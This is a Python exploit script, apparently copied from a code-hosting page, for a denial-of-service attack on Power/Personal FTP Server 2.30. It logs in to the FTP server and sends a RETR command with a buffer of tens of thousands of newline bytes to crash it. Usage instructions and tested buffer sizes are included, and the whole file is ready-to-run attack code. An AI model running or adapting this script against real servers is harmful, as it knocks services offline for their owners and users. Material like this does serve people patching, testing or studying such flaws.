68 lines
No EOL
1.7 KiB
Python
Executable file
68 lines
No EOL
1.7 KiB
Python
Executable file
#!/usr/bin/python
|
|
|
|
#--------------------------------------------
|
|
# Power/Personal FTP Server RETR Command DoS
|
|
#--------------------------------------------
|
|
|
|
# Title: Power/Personat FTP Server RETR Command DoS
|
|
# Author: antrhacks
|
|
# Software Link: http://www.cooolsoft.com/download/PowerFTP.EXE
|
|
# Version: 2.30
|
|
# Platform: Windows XP SP3 Home edition Fr
|
|
# Tested with buffersize: 82000, 83000, 84000, ... 92000
|
|
# Example: ./PowerFTP.py 192.168.0.10 test test 85000
|
|
|
|
import socket
|
|
import sys
|
|
|
|
# Description:
|
|
# RETR command overflow with PORT specified
|
|
|
|
def howto():
|
|
print ("Usage: scriptname.py <IP> <username> <password> <buffersize>\n")
|
|
|
|
def exploit(host,user,password):
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
sock.bind(('0.0.0.0', 6666)) # Need that for the PORT Command !!!
|
|
try:
|
|
sock.connect((host, 21))
|
|
except:
|
|
print ("Unable to connect to host")
|
|
sys.exit(1)
|
|
r=sock.recv(1024)
|
|
print r
|
|
r=sock.getsockname()
|
|
print r
|
|
sock.send("USER " + user + "\r\n")
|
|
r=sock.recv(1024)
|
|
print r
|
|
sock.send("PASS " + password + "\r\n")
|
|
r=sock.recv(1024)
|
|
print r
|
|
sock.send("PORT 192,168,0,11,26,10" + "\r\n") # 26,10 => 0x1a,0x0a => 6666
|
|
r=sock.recv(1024)
|
|
print r
|
|
sock.send("RETR " + buffer + " \r\n")
|
|
r=sock.recv(1024)
|
|
print r
|
|
sock.send("QUIT" + " \r\n")
|
|
r=sock.recv(1024)
|
|
print r
|
|
sock.close()
|
|
|
|
if len(sys.argv) <> 5:
|
|
howto()
|
|
sys.exit(1)
|
|
else:
|
|
host=sys.argv[1]
|
|
user=sys.argv[2]
|
|
password=sys.argv[3]
|
|
buffersize=int(sys.argv[4])
|
|
buffer="\x0a\x0a" * buffersize
|
|
exploit(host,user,password)
|
|
sys.exit(0)
|
|
|
|
# END
|
|
|
|
|
|
# (2010-07-15) - Inj3ct0r.com - |